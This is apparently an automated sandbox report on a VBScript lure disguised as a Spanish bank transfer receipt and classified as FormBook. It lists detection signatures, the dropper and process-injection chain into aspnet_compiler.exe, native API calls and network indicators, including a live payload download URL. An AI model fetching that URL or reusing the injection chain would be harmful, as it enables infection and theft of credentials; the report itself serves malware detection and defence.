Edit tour

Windows Analysis Report
justificante de transferencia.vbs

Overview

General Information

Sample name:	justificante de transferencia.vbs
Analysis ID:	1524799
MD5:	6a959a9276c026d279b40eedf42d93cb
SHA1:	7c7ef2838b5bce26ec80fa8c8becdd1b1242e5ae
SHA256:	a7a6b9a027fefdba700161804b4cdd67843534c5b34aeb341a491c895f1fbda8
Tags:	vbsuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Potential malicious VBS script found (has network functionality)

Sigma detected: WScript or CScript Dropper

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: AspNetCompiler Execution

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6644 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

temp_executable.exe (PID: 6736 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: 2A4E91A8185BC07992B63042C7A08059)

aspnet_compiler.exe (PID: 6840 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c1b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1425f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e493:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16542:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs", ProcessId: 6644, ProcessName: wscript.exe

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\temp_executable.exe, ParentProcessId: 6736, ParentProcessName: temp_executable.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe", ProcessId: 6840, ProcessName: aspnet_compiler.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs", ProcessId: 6644, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Yara detected FormBook

Source: Yara match	File source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.12:49710 version: TLS 1.2

Source:	Binary string: VCGDG76823.pdb source: wscript.exe, 00000001.00000002.2448209205.000001B594E7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2443496915.000001B5945D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2411349967.000001B5940F5000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2414930191.0000000000222000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.1.dr
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp

Networking

Potential malicious VBS script found (has network functionality)

Source:

Initial file: stream.SaveToFile filePath, 2 ' Overwrite existing file

Source: global traffic

HTTP traffic detected: GET /2alBy/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /2alBy/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: transfer.adttemp.com.br

Source: temp_executable.exe, 00000002.00000002.2440570878.0000000002547000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: temp_executable.exe, 00000002.00000002.2440570878.0000000002565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.br
Source: temp_executable.exe, 00000002.00000002.2440570878.0000000002565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.brl
Source: temp_executable.exe, 00000002.00000002.2440570878.0000000002547000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adttemp.com.br
Source: wscript.exe, 00000001.00000002.2448209205.000001B594E7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2443496915.000001B5945D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2411349967.000001B5940F5000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2414930191.0000000000222000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe, 00000002.00000002.2440570878.0000000002547000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe.1.dr	String found in binary or memory: https://transfer.adttemp.com.br/2alBy/sirdeeeeee.txt

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710

Source: unknown

HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.12:49710 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0042C563 NtClose,	3_2_0042C563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A235C0 NtCreateMutant,LdrInitializeThunk,	3_2_01A235C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01A22DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_01A22C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A23090 NtSetValueKey,	3_2_01A23090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A23010 NtOpenDirectoryObject,	3_2_01A23010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A24340 NtSetContextThread,	3_2_01A24340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A24650 NtSuspendThread,	3_2_01A24650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A239B0 NtGetContextThread,	3_2_01A239B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22BA0 NtEnumerateValueKey,	3_2_01A22BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22B80 NtQueryInformationFile,	3_2_01A22B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22BE0 NtQueryValueKey,	3_2_01A22BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22BF0 NtAllocateVirtualMemory,	3_2_01A22BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22B60 NtClose,	3_2_01A22B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22AB0 NtWaitForSingleObject,	3_2_01A22AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22AF0 NtWriteFile,	3_2_01A22AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22AD0 NtReadFile,	3_2_01A22AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22DB0 NtEnumerateKey,	3_2_01A22DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22DD0 NtDelayExecution,	3_2_01A22DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22D30 NtUnmapViewOfSection,	3_2_01A22D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22D00 NtSetInformationFile,	3_2_01A22D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A23D10 NtOpenProcessToken,	3_2_01A23D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22D10 NtMapViewOfSection,	3_2_01A22D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A23D70 NtOpenThread,	3_2_01A23D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22CA0 NtQueryInformationToken,	3_2_01A22CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22CF0 NtOpenProcess,	3_2_01A22CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22CC0 NtQueryVirtualMemory,	3_2_01A22CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22C00 NtQueryInformationProcess,	3_2_01A22C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22C60 NtCreateKey,	3_2_01A22C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22FA0 NtQuerySection,	3_2_01A22FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22FB0 NtResumeThread,	3_2_01A22FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22F90 NtProtectVirtualMemory,	3_2_01A22F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22FE0 NtCreateFile,	3_2_01A22FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22F30 NtCreateSection,	3_2_01A22F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22F60 NtCreateProcessEx,	3_2_01A22F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22EA0 NtAdjustPrivilegesToken,	3_2_01A22EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22E80 NtReadVirtualMemory,	3_2_01A22E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22EE0 NtQueueApcThread,	3_2_01A22EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A22E30 NtWriteVirtualMemory,	3_2_01A22E30

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_00BC11D8	2_2_00BC11D8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_00BC2B28	2_2_00BC2B28
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_00BC2B19	2_2_00BC2B19
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_00BC2B17	2_2_00BC2B17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_00402350	3_2_00402350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0042EB83	3_2_0042EB83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0040FCFB	3_2_0040FCFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_00404486	3_2_00404486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0040FD03	3_2_0040FD03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_00402E60	3_2_00402E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_004166B3	3_2_004166B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0040FF23	3_2_0040FF23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0040DFA3	3_2_0040DFA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB01AA	3_2_01AB01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FB1B0	3_2_019FB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA81CC	3_2_01AA81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E0100	3_2_019E0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8A118	3_2_01A8A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01ABB16B	3_2_01ABB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A2516C	3_2_01A2516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DF172	3_2_019DF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA70E9	3_2_01AA70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAF0E0	3_2_01AAF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F70C0	3_2_019F70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A9F0CC	3_2_01A9F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A3739A	3_2_01A3739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB03E6	3_2_01AB03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FE3F0	3_2_019FE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA132D	3_2_01AA132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019DD34C	3_2_019DD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAA352	3_2_01AAA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F52A0	3_2_019F52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A912ED	3_2_01A912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0B2C0	3_2_01A0B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A90274	3_2_01A90274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8D5B0	3_2_01A8D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AB0591	3_2_01AB0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F0535	3_2_019F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA7571	3_2_01AA7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A9E4F6	3_2_01A9E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAF43F	3_2_01AAF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA2446	3_2_01AA2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E1460	3_2_019E1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAF7B0	3_2_01AAF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019EC7C0	3_2_019EC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F0770	3_2_019F0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A14750	3_2_01A14750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0C6E0	3_2_01A0C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA16CC	3_2_01AA16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01ABA9A6	3_2_01ABA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F29A0	3_2_019F29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A06962	3_2_01A06962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F9950	3_2_019F9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0B950	3_2_01A0B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019D68B8	3_2_019D68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A1E8F0	3_2_01A1E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F38E0	3_2_019F38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A5D800	3_2_01A5D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F2840	3_2_019F2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FA840	3_2_019FA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0FB80	3_2_01A0FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A2DBF9	3_2_01A2DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA6BD7	3_2_01AA6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAFB76	3_2_01AAFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAAB40	3_2_01AAAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A35AA0	3_2_01A35AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A8DAAC	3_2_01A8DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019EEA80	3_2_019EEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A9DAC6	3_2_01A9DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A63A6C	3_2_01A63A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAFA49	3_2_01AAFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA7A46	3_2_01AA7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A08DBF	3_2_01A08DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A0FDC0	3_2_01A0FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019EADE0	3_2_019EADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FAD00	3_2_019FAD00
